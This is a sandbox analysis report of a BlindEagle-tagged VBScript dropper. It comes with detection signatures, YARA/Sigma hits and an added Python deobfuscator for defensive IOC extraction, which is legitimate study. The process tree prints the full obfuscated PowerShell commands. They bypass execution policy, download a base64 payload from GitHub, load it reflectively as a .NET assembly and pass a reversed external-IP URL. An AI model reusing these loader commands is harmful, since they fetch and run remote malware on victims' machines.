Windows
Analysis Report
uLfuBVyZFV.vbs
Overview
General Information
Sample name: | uLfuBVyZFV.vbs (renamed because the original name is a hash value) |
Original sample name: | 79c7020002b461319a5b25a22be2c4fabfcc5bcef788530d380ebd65872f4d9a.vbs |
Analysis ID: | 1523829 |
MD5: | 123316fb7db9c910bd92a9ad7e7bbdbc |
SHA1: | 43dbabc790f0a0e20b397ad707bb33cb77004998 |
SHA256: | 79c7020002b461319a5b25a22be2c4fabfcc5bcef788530d380ebd65872f4d9a |
Tags: | BlindEagle, vbs, user-JAMESWT_MHT |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 6644 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\uLfuBVyZFV.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  - powershell.exe (PID: 2980 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycpKCAoKCdzQk91cmwgJysnPSBVJysnTkloJysndHRwczonKycvL3Jhdy4nKydnaXRodWInKyd1c2UnKydyY29udCcrJ2VudC4nKydjb20nKycvJysnTicrJ29EZXQnKydlY3RPbi9Ob0RldCcrJ2VjdE8nKyduLycrJ3JlJysnZnMvaGVhZCcrJ3MvbWFpbi9EZXRhaCcrJ05vJysndGgtVi4nKyd0JysneHRVJysnTkk7IHNCJysnT2JhJysncycrJ2U2JysnNEMnKydvbnRlbnQgPSAoTmUnKyd3LU9iamVjJysndCAnKydTJysneXN0JysnZScrJ20nKycuTmV0LlcnKydlYkNsaWVudCkuRG93JysnbmxvYWRTdHInKydpbmcnKycoJysnc0JPdXJsJysnKTsgc0InKydPYmluYXInKyd5JysnQ29udGVudCAnKyc9IFtTJysneScrJ3N0ZScrJ20uQ28nKyduJysndicrJ2VydCcrJ106OkZyb21CJysnYScrJ3MnKydlNjRTJysndHJpbmcnKycoc0JPJysnYmFzZTY0QycrJ28nKydudGVudCk7JysnIHMnKydCT2FzJysnc2VtJysnYmx5ID0gW1JlZmxlY3Rpb24uJysnQXNzZW0nKydiJysnbCcrJ3ldOjonKydMb2EnKydkKCcrJ3NCT2JpbmFyeUNvbnRlbicrJ3QpOyBbJysnZG5saScrJ2IuSU8uJysnSG9tZV0nKyc6OlZBSScrJygnKydoUEl0eHQuUlInKydCRCcrJ0wvMDU0LzQzJysnMS4nKyc5JysnMicrJzEuNjQuJysnODknKycxLy8nKyc6cHR0aGhQSSwgJysnaFBJZGVzYXRpdicrJ2EnKydkb2hQSSwgJysnaFAnKydJZCcrJ2UnKydzJysnYXQnKydpdmFkbycrJ2hQSSwgaCcrJ1BJJysnZGVzYXRpdmEnKydkbycrJ2gnKydQSSwgJysnaFAnKydJYXNwJysnbmV0X3JlZ2Jyb3dzJysnZScrJ3JzaFBJLCcrJyBoUEknKydoJysnUEksJysnaFBJaCcrJ1AnKydJKScpLUNSZVBsQWNFICdVTkknLFtDaGFSXTM5ICAtcmVQTEFjZSAgJ2hQSScsW0NoYVJdMzQgIC1yZVBMQWNlICAoW0NoYVJdMTE1K1tDaGFSXTY2K1tDaGFSXTc5KSxbQ2hhUl0zNikp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
    - conhost.exe (PID: 7180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    - powershell.exe (PID: 7304 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'+'th-V.'+'t'+'xtU'+'NI; sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'+'nloadStr'+'ing'+'('+'sBOurl'+'); sB'+'Obinar'+'y'+'Content '+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+' s'+'BOas'+'sem'+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'+'net_regbrows'+'e'+'rshPI,'+' hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))" MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
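The stage-2 command line (PID 7304) can be unwrapped statically without running it. The Python below is an added example written for this page, not part of the sandbox report: it embeds the `-command` argument of PID 7304 exactly as printed in the process tree (with the extraction spacing removed), derives the `iex` verb that `$EnV:cOMSPeC[4,15,25] -join ''` builds from the cmd.exe path, joins the `'+'`-concatenated literals, applies the three `-creplace`/`-replace` substitutions the command performs (`UNI` becomes `'`, `hPI` becomes `"`, the `[ChaR]115+[ChaR]66+[ChaR]79` pattern `sBO` becomes `$`), and reverses the first argument of `[dnlib.IO.Home]::VAI`, which is the next-stage URL written backwards. The only assumption is that `%COMSPEC%` has the Windows default value `C:\Windows\system32\cmd.exe` in the sandbox; the stage-1 command (PID 2980) is just the UTF-8 base64 wrapper of this same text, as its `$OWjuxd = [system.Text.encoding]::UTF8.GetString(...)` line shows, so a decoder for that stage only needs a base64 step in front of this one.

```python
import re

# Stage-2 "-command" argument of powershell.exe (PID 7304) as the report prints it,
# minus the spacing that page extraction inserted into the command line.
STAGE2 = (
    ". ( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'"
    "+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'"
    "+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'"
    "+'th-V.'+'t'+'xtU'+'NI; sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'"
    "+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'"
    "+'nloadStr'+'ing'+'('+'sBOurl'+'); sB'+'Obinar'+'y'+'Content '"
    "+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'"
    "+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+' s'+'BOas'+'sem'"
    "+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('"
    "+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('"
    "+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'"
    "+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'"
    "+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'"
    "+'net_regbrows'+'e'+'rshPI,'+' hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')"
    "-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce "
    "([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))"
)

# Assumption: %COMSPEC% is the Windows default in the sandbox.
COMSPEC = r"C:\Windows\system32\cmd.exe"

# One "-creplace/-replace <pattern>,[char]N" operation; the pattern is either a
# quoted literal or a parenthesised [char]a+[char]b+... expression.
OP_RE = re.compile(
    r"-(c?replace)\s+(?:'([^']*)'|\(([^)]*)\))\s*,\s*\[char\](\d+)",
    re.IGNORECASE,
)


def comspec_verb(comspec: str = COMSPEC, idx=(4, 15, 25)) -> str:
    """$EnV:cOMSPeC[4,15,25] -join '' picks 'i','e','x' out of the cmd.exe path."""
    return "".join(comspec[i] for i in idx)


def concat_literals(expr: str) -> str:
    """Join the '+'-concatenated single-quoted literals (none contains a quote)."""
    return "".join(re.findall(r"'([^']*)'", expr))


def char_expr(text: str) -> str:
    """'[ChaR]115+[ChaR]66+[ChaR]79' -> 'sBO'."""
    codes = re.findall(r"\[char\](\d+)", text, re.IGNORECASE)
    return "".join(chr(int(n)) for n in codes)


def deobfuscate(cmd: str) -> str:
    """Rebuild the script that the -join/-replace chain hands to Invoke-Expression."""
    first = OP_RE.search(cmd)
    script = concat_literals(cmd[: first.start()])
    for m in OP_RE.finditer(cmd, first.start()):
        op, lit, grp, code = m.groups()
        pattern = lit if lit is not None else char_expr(grp)
        repl = chr(int(code))
        # -creplace is case-sensitive, -replace is not
        flags = 0 if op.lower() == "creplace" else re.IGNORECASE
        script = re.sub(re.escape(pattern), lambda _m, r=repl: r, script, flags=flags)
    return script


def extract_iocs(script: str) -> dict:
    """Pull the next-stage URL and the arguments passed to the loaded .NET assembly."""
    url = re.search(r"\$url = '([^']+)'", script).group(1)
    raw_args = re.search(r"::VAI\((.*)\)$", script).group(1)
    vai_args = [a.strip().strip('"') for a in raw_args.split(",")]
    return {
        "stage_url": url,
        "loader_entry": "[dnlib.IO.Home]::VAI",
        "c2_reversed": vai_args[0],
        "c2": vai_args[0][::-1],  # first argument is the real URL written backwards
        "vai_args": vai_args,
    }


if __name__ == "__main__":
    print("verb:", comspec_verb())
    decoded = deobfuscate(STAGE2)
    print(decoded)
    for key, value in extract_iocs(decoded).items():
        print(f"{key}: {value}")
```

The decoded script downloads a base64 text file from the raw.githubusercontent.com URL, turns it into bytes, loads those bytes as a .NET assembly with `[Reflection.Assembly]::Load`, and calls `[dnlib.IO.Home]::VAI` with the reversed URL plus a process name (`aspnet_regbrowsers`) as arguments. For detection, the durable command-line indicators are the ones the Sigma hits above already point at: an `$env:COMSPEC[...]` index trick joined with `-join ''`, a `-creplace`/`-replace` chain built from `[char]` codes, and `[Reflection.Assembly]::Load` applied to `FromBase64String` output; the literal placeholders (`UNI`, `hPI`, `sBO`) change between samples and should not be matched on.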
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems) |